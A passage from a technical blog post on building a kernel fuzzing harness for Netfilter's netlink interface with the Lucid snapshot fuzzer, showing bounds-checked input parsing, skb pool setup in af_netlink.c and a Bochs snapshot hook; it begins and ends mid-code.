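    memcpy(&amp;total_len, blob, sizeof(total_len));
    memcpy(&amp;num_envs, blob + sizeof(total_len), sizeof(num_envs));

    // Whatever total_len counts exactly, it can't exceed what we were given
    if (total_len &gt; blob_len || num_envs &gt; max_envs)
        return -1;

    size_t off = hdr_len;
    int delivered = 0;
    for (uint32_t i = 0; i &lt; num_envs; i++) {
        uint32_t len;

        // Envelope header must fit in what's left
        if (blob_len - off &lt; sizeof(len))
            return -1;
        memcpy(&amp;len, blob + off, sizeof(len));
        off += sizeof(len);

        // Payload must respect the cap and stay inside the blob
        if (len &gt; max_env_len || len &gt; blob_len - off)
            return -1;

        deliver(blob + off, len, ctx);
        off += len;
        delivered++;
    }
    return delivered;
}
</code></pre></div></div>

<p>Every length is checked against the bytes actually remaining rather than trusted, since the mutator is free to produce nonsense headers and we want harness bugs to stay out of the crash bucket.</p>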

<h2 id="harness-init-code">Harness Init Code</h2>
<p>Let’s go ahead and fill out the logic for the initialization routine of our custom syscall. This is code that will be invoked <em>once</em> before we start fuzzing and will not occur in the fuzzing loop; it is meant to set up everything we need for the harness to work appropriately. This is where we will set up the <code class="language-plaintext highlighter-rouge">skbs</code>, and to do so we’ll need to define some constants that describe maximum input shapes. The first constant we need to set is <code class="language-plaintext highlighter-rouge">MAX_NUM_ENVELOPES</code>, which tells us how many <code class="language-plaintext highlighter-rouge">struct lf_envelope</code> structures can exist in a <code class="language-plaintext highlighter-rouge">struct lf_input</code>. We’ll also need to know <code class="language-plaintext highlighter-rouge">MAX_ENVELOPE_LEN</code>, which describes how big each envelope’s data payload can be. Finally, as a byproduct of both the maximum number of envelope structures and their maximum length, we’ll deduce <code class="language-plaintext highlighter-rouge">MAX_INPUT_LEN</code>, which is the largest possible size we can achieve for the <code class="language-plaintext highlighter-rouge">lf_input-&gt;total_len</code> value.</p>

<p>For now, let’s go ahead and say that we can have up to 24 envelopes, and each one can be up to 8192 bytes. In the mutator, we’ll define min/max thresholds where we mostly uniformly distribute size selection between those two thresholds, with a small possibility of going lower or higher than them. So most of the time we’ll do at least 8 envelopes and at most 16 envelopes. Something like that. We’ll make 1-7 and 17-24 very rare. Same with the sizes: we’ll try not to send an insane amount of <code class="language-plaintext highlighter-rouge">nftables</code> messages per envelope and approach the 8k max. But this is for a later blogpost on the mutator.</p>
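
<p>To give a feel for that selection policy, here is a small sketch of picking an envelope count. It’s written in C to match the harness code and is not the actual mutator: the function names, the xorshift PRNG, and the 2% odds for each rare band are placeholders I picked for illustration.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>// Sketch only: mostly 8-16 envelopes, rarely 1-7 or 17-24.
#include &lt;stdint.h&gt;

// Small xorshift64 PRNG; the state must be seeded with a nonzero value
static uint64_t xorshift64(uint64_t *state)
{
    uint64_t x = *state;
    x ^= x &lt;&lt; 13;
    x ^= x &gt;&gt; 7;
    x ^= x &lt;&lt; 17;
    *state = x;
    return x;
}

// Integer in [lo, hi]; modulo bias is ignored, which is fine for a sketch
static uint32_t rand_range(uint64_t *state, uint32_t lo, uint32_t hi)
{
    return lo + (uint32_t)(xorshift64(state) % (hi - lo + 1));
}

// Pick how many envelopes the next input should carry
uint32_t pick_num_envelopes(uint64_t *state)
{
    uint32_t roll = rand_range(state, 0, 99);

    // Hypothetical odds: 2% below the common band, 2% above it
    if (roll &lt; 2)
        return rand_range(state, 1, 7);
    if (roll &lt; 4)
        return rand_range(state, 17, 24);

    // The common case: uniform over the 8-16 band
    return rand_range(state, 8, 16);
}
</code></pre></div></div>

<p>The same banded approach would work for envelope sizes, with the 8192-byte maximum as the hard upper bound.</p>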

<p>With the constants in mind we can build. We can do all of this in <code class="language-plaintext highlighter-rouge">af_netlink.c</code> in <code class="language-plaintext highlighter-rouge">/net/netlink</code> because it has all of the things we need access to and makes everything easy. So we’ll implement <code class="language-plaintext highlighter-rouge">lucid_fuzz_init</code> in there, which means the syscall in our standalone <code class="language-plaintext highlighter-rouge">lucid_fuzz.c</code> source file needs access to <code class="language-plaintext highlighter-rouge">lucid_fuzz_init</code>, so we’ll change that file to:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;linux/kernel.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/syscalls.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;linux/uaccess.h&gt;</span><span class="cp">
</span>
<span class="c1">// Declared in /include/net/lucid_fuzz.h, defined in /net/netlink/af_netlink.c</span>
<span class="k">extern</span> <span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>

<span class="n">SYSCALL_DEFINE2</span><span class="p">(</span><span class="n">lucid_fuzz</span><span class="p">,</span> <span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">,</span> <span class="n">len</span><span class="p">)</span>
<span class="p">{</span>
    <span class="kt">int</span> <span class="n">ret</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

    <span class="n">printk</span><span class="p">(</span><span class="s">"Inside lucid fuzz!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">printk</span><span class="p">(</span><span class="s">"Calling lucid_fuzz_init...</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="n">ret</span> <span class="o">=</span> <span class="n">lucid_fuzz_init</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">len</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">ret</span><span class="p">)</span>
        <span class="k">goto</span> <span class="n">done</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">ret</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we’ll need to create that header file in <code class="language-plaintext highlighter-rouge">/include/net/lucid_fuzz.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/* SPDX-License-Identifier: GPL-2.0 */</span>
<span class="cp">#ifndef _NET_LUCID_FUZZ_H
#define _NET_LUCID_FUZZ_H
</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">);</span>

<span class="cp">#endif </span><span class="cm">/* _NET_LUCID_FUZZ_H */</span><span class="cp">
</span></code></pre></div></div>

<p>Now we can include that header in <code class="language-plaintext highlighter-rouge">af_netlink.c</code> and start our additions to that source file with the constants we discussed:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cm">/*************** Start of Lucid Fuzzing Harness *****************************/</span>
<span class="cp">#define LF_MAX_NUM_ENVS 24UL // Number of envelopes in an input
#define LF_MAX_ENV_LEN 8192UL // Number of bytes in an envelope payload 
#define LF_INPUT_HDR_SIZE (sizeof(u32) * 2) // lf_input-&gt;total_len, num_envs
#define LF_ENV_HDR_SIZE (sizeof(u32)) // lf_envelope-&gt;len
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)
</span></code></pre></div></div>
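<p>As a quick sanity check on the arithmetic, the same macros can be compiled in userland with <code class="language-plaintext highlighter-rouge">uint32_t</code> standing in for the kernel’s <code class="language-plaintext highlighter-rouge">u32</code> (that substitution and the static assertions are additions for this sketch, not part of the harness):</p>

```c
#include <stdint.h>

#define LF_MAX_NUM_ENVS 24UL
#define LF_MAX_ENV_LEN 8192UL
#define LF_INPUT_HDR_SIZE (sizeof(uint32_t) * 2)
#define LF_ENV_HDR_SIZE (sizeof(uint32_t))
#define LF_MAX_TOTAL_ENV ((LF_MAX_ENV_LEN + LF_ENV_HDR_SIZE) * LF_MAX_NUM_ENVS)
#define LF_MAX_INPUT_LEN (LF_MAX_TOTAL_ENV + LF_INPUT_HDR_SIZE)

/* (8192 + 4) * 24 = 196704 bytes of envelope headers and payloads */
_Static_assert(LF_MAX_TOTAL_ENV == 196704UL, "envelope region size");

/* ...plus the 8-byte input header = 196712 bytes for the largest input */
_Static_assert(LF_MAX_INPUT_LEN == 196712UL, "largest possible input");
```

<p>So the input buffer that Lucid injects into ends up a little over 192KB.</p>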

<p>Next, I defined the <code class="language-plaintext highlighter-rouge">LUCID_SIGNATURE</code> that Lucid scans for when trying to decide where to inject inputs. It knows the layout of the <code class="language-plaintext highlighter-rouge">struct lf_fuzzcase</code> so it knows that directly after the signature portion it has a length field and then the variable length data field where it inserts the raw bytes:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Structure that describes an input as Lucid sees it</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="p">{</span>
	<span class="kt">unsigned</span> <span class="kt">char</span> <span class="n">signature</span><span class="p">[</span><span class="mi">16</span><span class="p">];</span>
	<span class="kt">size_t</span> <span class="n">input_len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">input</span><span class="p">[</span><span class="n">LF_MAX_INPUT_LEN</span><span class="p">];</span>
<span class="p">};</span>

<span class="c1">// Create instance of the struct</span>
<span class="k">struct</span> <span class="n">lf_fuzzcase</span> <span class="n">fc</span> <span class="o">=</span> <span class="p">{</span>
	<span class="p">.</span><span class="n">signature</span> <span class="o">=</span> <span class="n">LUCID_SIGNATURE</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="mi">0</span><span class="p">,</span>
	<span class="p">.</span><span class="n">input</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">}</span>	<span class="cm">/* Where Lucid injects an input */</span>
<span class="p">};</span>
</code></pre></div></div>
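<p>To illustrate the idea of scanning for a signature and injecting after it, here is a small userland sketch in C. Lucid’s real injection code lives in the fuzzer itself and is not shown in this post, so <code class="language-plaintext highlighter-rouge">find_signature</code>, <code class="language-plaintext highlighter-rouge">inject_input</code>, the shortened 64-byte <code class="language-plaintext highlighter-rouge">input</code> array, and the choice to write the length field during injection are all assumptions:</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define SIG_LEN 16

/* Userland mirror of the harness struct; input is shortened for the sketch */
struct fuzzcase {
	unsigned char signature[SIG_LEN];
	size_t input_len;
	uint8_t input[64];
};

/* Return the offset of the first signature match in mem, or -1 if absent */
static long find_signature(const uint8_t *mem, size_t mem_len,
                           const unsigned char sig[SIG_LEN]) {
	if (mem_len < SIG_LEN)
		return -1;

	for (size_t off = 0; off + SIG_LEN <= mem_len; off++) {
		if (memcmp(mem + off, sig, SIG_LEN) == 0)
			return (long)off;
	}
	return -1;
}

/* Write the length and raw bytes at the offsets implied by the layout */
static int inject_input(uint8_t *mem, size_t mem_len, long sig_off,
                        const uint8_t *data, size_t len) {
	size_t base = (size_t)sig_off;

	/* The whole struct must fit in the scanned region */
	if (sig_off < 0 || base + sizeof(struct fuzzcase) > mem_len)
		return -1;

	/* The payload must fit in the input field */
	if (len > sizeof(((struct fuzzcase *)0)->input))
		return -1;

	memcpy(mem + base + offsetof(struct fuzzcase, input_len), &len, sizeof(len));
	memcpy(mem + base + offsetof(struct fuzzcase, input), data, len);
	return 0;
}
```

<p>Using <code class="language-plaintext highlighter-rouge">offsetof</code> rather than hardcoded numbers keeps the sketch honest about padding: on a typical 64-bit target the length lands at offset 16 and the data at offset 24.</p>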

<p>Then we define some globals that we need to initialize:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">handler</code>: A function pointer to the <code class="language-plaintext highlighter-rouge">nfnetlink_rcv</code> function, which we look up by protocol in the <code class="language-plaintext highlighter-rouge">init</code> network namespace</li>
  <li><code class="language-plaintext highlighter-rouge">kern_sock</code>: The <code class="language-plaintext highlighter-rouge">struct sock</code> that is registered during kernel boot for the Netfilter subsystem to receive data from userland (and I guess kernel threads?)</li>
  <li><code class="language-plaintext highlighter-rouge">skbs</code>: Just a flat array of pointers to the <code class="language-plaintext highlighter-rouge">skb</code> structures we’ll use to wrap our envelope data; the harness swaps each envelope wrapper for an <code class="language-plaintext highlighter-rouge">skb</code></li>
</ul>

<p>Finally, here are the globals and the initialization routine:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// The function pointer we send the skbs to, the netlink rcv handler for</span>
<span class="c1">// netfilter nfnetlink_rcv</span>
<span class="kt">void</span> <span class="o">*</span><span class="n">handler</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// The kernel-registered socket waiting for input from us</span>
<span class="k">struct</span> <span class="n">sock</span> <span class="o">*</span><span class="n">kern_sock</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

<span class="c1">// Pool of skbs we use to store data in envelopes</span>
<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skbs</span><span class="p">[</span><span class="n">LF_MAX_NUM_ENVS</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span> 

<span class="c1">// Our initialization function, called before we do any fuzzing</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_init</span><span class="p">(</span><span class="k">const</span> <span class="kt">void</span> <span class="n">__user</span> <span class="o">*</span><span class="n">data</span><span class="p">,</span> <span class="kt">size_t</span> <span class="n">len</span><span class="p">)</span> <span class="p">{</span>
	<span class="kt">int</span> <span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>

	<span class="n">printk</span><span class="p">(</span><span class="s">"Hello from lucid_fuzz_init</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
	<span class="n">printk</span><span class="p">(</span><span class="s">"LF_MAX_INPUT_LEN is: %lu</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">);</span>

	<span class="c1">// Copy the user data over to the fuzzcase instance if there is any</span>
	<span class="k">if</span> <span class="p">(</span><span class="n">len</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="o">&amp;&amp;</span> <span class="n">len</span> <span class="o">&lt;=</span> <span class="n">LF_MAX_INPUT_LEN</span><span class="p">)</span> <span class="p">{</span>
		<span class="k">if</span> <span class="p">(</span><span class="n">copy_from_user</span><span class="p">(</span>
			<span class="n">fc</span><span class="p">.</span><span class="n">input</span><span class="p">,</span> <span class="n">data</span><span class="p">,</span> <span class="n">len</span>
		<span class="p">))</span>
		<span class="p">{</span>
			<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">EFAULT</span><span class="p">;</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>
		<span class="n">fc</span><span class="p">.</span><span class="n">input_len</span> <span class="o">=</span> <span class="n">len</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Doing this how other kernel code does it, lock the global table</span>
	<span class="n">netlink_table_grab</span><span class="p">();</span>

	<span class="c1">// Pre-set the err as if we failed to find the handler for NETFILTER</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOENT</span><span class="p">;</span>

	<span class="c1">// Check to see if the handler is registered</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">nl_table</span><span class="p">[</span><span class="n">NETLINK_NETFILTER</span><span class="p">].</span><span class="n">registered</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab the kernel socket</span>
	<span class="n">kern_sock</span> <span class="o">=</span> <span class="n">netlink_lookup</span><span class="p">(</span><span class="o">&amp;</span><span class="n">init_net</span><span class="p">,</span> <span class="n">NETLINK_NETFILTER</span><span class="p">,</span> <span class="mi">0</span><span class="p">);</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">kern_sock</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Grab that .input handler</span>
	<span class="n">handler</span> <span class="o">=</span> <span class="n">nlk_sk</span><span class="p">(</span><span class="n">kern_sock</span><span class="p">)</span><span class="o">-&gt;</span><span class="n">netlink_rcv</span><span class="p">;</span>
	<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">handler</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">netlink_table_ungrab</span><span class="p">();</span>
		<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// Ungrab the table we're done with it</span>
	<span class="n">netlink_table_ungrab</span><span class="p">();</span>

	<span class="c1">// Pre-set</span>
	<span class="n">err</span> <span class="o">=</span> <span class="o">-</span><span class="n">ENOMEM</span><span class="p">;</span>

	<span class="c1">// Create all of the socket buffers we need and store them</span>
	<span class="k">for</span> <span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">LF_MAX_NUM_ENVS</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
		<span class="n">skb</span> <span class="o">=</span> <span class="n">alloc_skb</span><span class="p">(</span><span class="n">LF_MAX_ENV_LEN</span><span class="p">,</span> <span class="n">GFP_KERNEL</span><span class="p">);</span>
		<span class="c1">// If we failed, unroll all the previous allocations</span>
		<span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">skb</span><span class="p">)</span> <span class="p">{</span>
			<span class="k">while</span> <span class="p">(</span><span class="o">--</span><span class="n">i</span> <span class="o">&gt;=</span> <span class="mi">0</span><span class="p">)</span> <span class="p">{</span>
				<span class="n">kfree_skb</span><span class="p">(</span><span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
				<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
			<span class="p">}</span>
			<span class="k">goto</span> <span class="n">done</span><span class="p">;</span>
		<span class="p">}</span>

		<span class="c1">// Initialize what we need to look legit</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">pkt_type</span> <span class="o">=</span> <span class="n">PACKET_HOST</span><span class="p">;</span>
		<span class="n">skb</span><span class="o">-&gt;</span><span class="n">sk</span> <span class="o">=</span> <span class="n">kern_sock</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">portid</span> <span class="o">=</span> <span class="mh">0x1337</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">dst_group</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">uid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_UID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">creds</span><span class="p">.</span><span class="n">gid</span> <span class="o">=</span> <span class="n">GLOBAL_ROOT_GID</span><span class="p">;</span>
		<span class="n">NETLINK_CB</span><span class="p">(</span><span class="n">skb</span><span class="p">).</span><span class="n">flags</span> <span class="o">=</span> <span class="n">NETLINK_SKB_DST</span><span class="p">;</span>

		<span class="c1">// Store the skb</span>
		<span class="n">skbs</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="n">skb</span><span class="p">;</span>
	<span class="p">}</span>

	<span class="c1">// We are so done dude, it worked</span>
	<span class="n">err</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>

<span class="nl">done:</span>
	<span class="k">return</span> <span class="n">err</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This should initialize all of the structures we need to start actually parsing inputs and dispatching them in the main harness function.</p>
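<p>The allocate-then-unroll pattern in that loop is easy to get subtly wrong, so here is a userland sketch of the same idea with <code class="language-plaintext highlighter-rouge">malloc</code>/<code class="language-plaintext highlighter-rouge">free</code> standing in for <code class="language-plaintext highlighter-rouge">alloc_skb</code>/<code class="language-plaintext highlighter-rouge">kfree_skb</code>. The <code class="language-plaintext highlighter-rouge">limited_malloc</code> hook is a made-up helper that exists only so a failure can be simulated:</p>

```c
#include <stdlib.h>

#define POOL_SIZE 24
#define BUF_LEN 8192

/* Pool of pre-allocated buffers, analogous to the skbs array */
static void *pool[POOL_SIZE];

/* Hypothetical allocator that fails once its budget runs out */
static int allocs_allowed = POOL_SIZE;
static void *limited_malloc(size_t len) {
	if (allocs_allowed <= 0)
		return NULL;
	allocs_allowed--;
	return malloc(len);
}

/* Fill the pool, or free everything allocated so far and report failure */
static int pool_init(void *(*alloc_fn)(size_t)) {
	int i;

	for (i = 0; i < POOL_SIZE; i++) {
		void *buf = alloc_fn(BUF_LEN);
		if (!buf) {
			/* Slot i failed, so unroll slots i-1 down to 0 */
			while (--i >= 0) {
				free(pool[i]);
				pool[i] = NULL;
			}
			return -1;
		}
		pool[i] = buf;
	}
	return 0;
}
```

<p>The important detail is that the index has to be signed for <code class="language-plaintext highlighter-rouge">while (--i &gt;= 0)</code> to terminate, which is why the harness declares <code class="language-plaintext highlighter-rouge">i</code> as an <code class="language-plaintext highlighter-rouge">int</code>.</p>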

<h2 id="main-parsing-routine">Main Parsing Routine</h2>
<p>We’ve reached the point now where the input buffer global is loaded with data and we know the address of the function to invoke to dispatch the data to Netfilter. We’ve also initialized the socket buffers we’re going to use to do the transportation. We need to describe what an input looks like, so let’s define our input structures.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Define our input structures</span>
<span class="k">struct</span> <span class="n">lf_input</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">total_len</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">num_envs</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>

<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="p">{</span>
	<span class="n">u32</span> <span class="n">len</span><span class="p">;</span>
	<span class="n">u8</span> <span class="n">data</span><span class="p">[];</span>
<span class="p">};</span>
</code></pre></div></div>
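<p>To picture what these structures look like as raw bytes, here is a userland sketch that serializes an input the way a test-case generator might. The helper names <code class="language-plaintext highlighter-rouge">input_begin</code> and <code class="language-plaintext highlighter-rouge">input_add_env</code> are invented for this example, and fields are written in native byte order on the assumption that the generator and the harness run on the same architecture:</p>

```c
#include <stdint.h>
#include <string.h>

#define INPUT_HDR_SIZE (sizeof(uint32_t) * 2) /* total_len, num_envs */
#define ENV_HDR_SIZE   (sizeof(uint32_t))     /* len */

/* Start an empty input in buf; returns bytes used so far, 0 on failure */
static size_t input_begin(uint8_t *buf, size_t cap) {
	uint32_t total = (uint32_t)INPUT_HDR_SIZE;
	uint32_t num = 0;

	if (cap < INPUT_HDR_SIZE)
		return 0;

	memcpy(buf, &total, sizeof(total));
	memcpy(buf + sizeof(total), &num, sizeof(num));
	return INPUT_HDR_SIZE;
}

/* Append one envelope and patch the header; returns new length, 0 on failure */
static size_t input_add_env(uint8_t *buf, size_t cap, size_t used,
                            const void *payload, uint32_t len) {
	uint32_t total, num;

	/* Make sure the envelope header and payload both fit */
	if (used < INPUT_HDR_SIZE || used > cap)
		return 0;
	if (cap - used < ENV_HDR_SIZE || cap - used - ENV_HDR_SIZE < len)
		return 0;

	/* Envelope: u32 length followed by the payload bytes */
	memcpy(buf + used, &len, sizeof(len));
	memcpy(buf + used + ENV_HDR_SIZE, payload, len);
	used += ENV_HDR_SIZE + len;

	/* Patch total_len and bump num_envs in the input header */
	total = (uint32_t)used;
	memcpy(&num, buf + sizeof(uint32_t), sizeof(num));
	num++;
	memcpy(buf, &total, sizeof(total));
	memcpy(buf + sizeof(uint32_t), &num, sizeof(num));
	return used;
}
```

<p>Two envelopes carrying 3 and 5 bytes, for example, would serialize to 8 + (4 + 3) + (4 + 5) = 24 bytes with <code class="language-plaintext highlighter-rouge">total_len</code> set to 24 and <code class="language-plaintext highlighter-rouge">num_envs</code> set to 2.</p>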

<p>The first thing we do in the main loop is take the snapshot that Bochs will save to disk. The Lucid workflow is something like:</p>
<ol>
  <li>develop environment, harness</li>
  <li>put a special NOP operation in the harness where you want to snapshot fuzz from (<code class="language-plaintext highlighter-rouge">xchg dx, dx</code>)</li>
  <li>run the environment/harness in the <code class="language-plaintext highlighter-rouge">gui-bochs</code>. This is a relatively normal Bochs binary built with GUI support that is supposed to be user-friendly and allows you to dump this Bochs snapshot to disk</li>
  <li>the Rust fuzzer binary, <code class="language-plaintext highlighter-rouge">lucid-fuzz</code>, can then take that Bochs snapshot on disk and resume its execution with a purpose-built <code class="language-plaintext highlighter-rouge">lucid-bochs</code> binary. This will call into the Lucid fuzzer before it emulates the first instruction and create a new kind of snapshot that Lucid can understand and restore every fuzzing iteration.</li>
</ol>

<p>Below is the code I’ve added to Bochs to save the Bochs snapshot to disk when we encounter the <code class="language-plaintext highlighter-rouge">xchg dx, dx</code> NOP, where <code class="language-plaintext highlighter-rouge">i</code> is a variable name for the instruction structure:</p>
<div class="language-c++ highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if BX_SNAPSHOT
</span>  <span class="c1">// Check for take snapshot instruction `xchg dx, dx`</span>
  <span class="k">if</span> <span class="p">((</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="n">i</span><span class="o">-&gt;</span><span class="n">dst</span><span class="p">())</span> <span class="o">&amp;&amp;</span> <span class="p">(</span><span class="n">i</span><span class="o">-&gt;</span><span class="n">src</span><span class="p">()</span> <span class="o">==</span> <span class="mi">2</span><span class="p">))</span> <span class="p">{</span>
    <span class="n">BX_COMMIT_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">BX_CPU_THIS_PTR</span> <span class="n">async_event</span><span class="p">)</span>
      <span class="k">return</span><span class="p">;</span>
    <span class="o">++</span><span class="n">i</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">save_dir</span><span class="p">[]</span> <span class="o">=</span> <span class="s">"/tmp/lucid_snapshot"</span><span class="p">;</span>
    <span class="n">mkdir</span><span class="p">(</span><span class="n">save_dir</span><span class="p">,</span> <span class="mo">0777</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Saving Lucid snapshot to '%s'...</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">save_dir</span><span class="p">);</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">SIM</span><span class="o">-&gt;</span><span class="n">save_state</span><span class="p">(</span><span class="n">save_dir</span><span class="p">))</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Successfully saved snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
      <span class="n">sleep</span><span class="p">(</span><span class="mi">2</span><span class="p">);</span>
      <span class="n">exit</span><span class="p">(</span><span class="mi">0</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="k">else</span> <span class="p">{</span>
      <span class="n">printf</span><span class="p">(</span><span class="s">"Failed to save snapshot</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="p">}</span>
    <span class="n">BX_EXECUTE_INSTRUCTION</span><span class="p">(</span><span class="n">i</span><span class="p">);</span>
  <span class="p">}</span>
<span class="cp">#endif
</span></code></pre></div></div>

<p>Then we make sure we have enough bytes to form the metadata structure (<code class="language-plaintext highlighter-rouge">lf_input</code>) and sanity check its values before moving on to the nested envelopes. You’ll notice that all error paths are <code class="language-plaintext highlighter-rouge">return 1;</code>. This is so that during fuzzing and mutator development, a malformed input skips over the snapshot restore NOP instruction at the end of the main fuzzing loop in the harness. The resulting cascade of timeouts will let us know that we have a bug in our mutator. Here is the main loop:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Main input processing logic</span>
<span class="kt">int</span> <span class="nf">lucid_fuzz_handle_input</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span> <span class="p">{</span>
	<span class="k">struct</span> <span class="n">lf_input</span> <span class="o">*</span><span class="n">input</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">lf_envelope</span> <span class="o">*</span><span class="n">env</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="k">struct</span> <span class="n">sk_buff</span> <span class="o">*</span><span class="n">fuzz_skb</span> <span class="o">=</span> <span class="nb">NULL</span><span class="p">;</span>
	<span class="n">u32</span> <span class="n">remaining</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
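	<span class="n">u32</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
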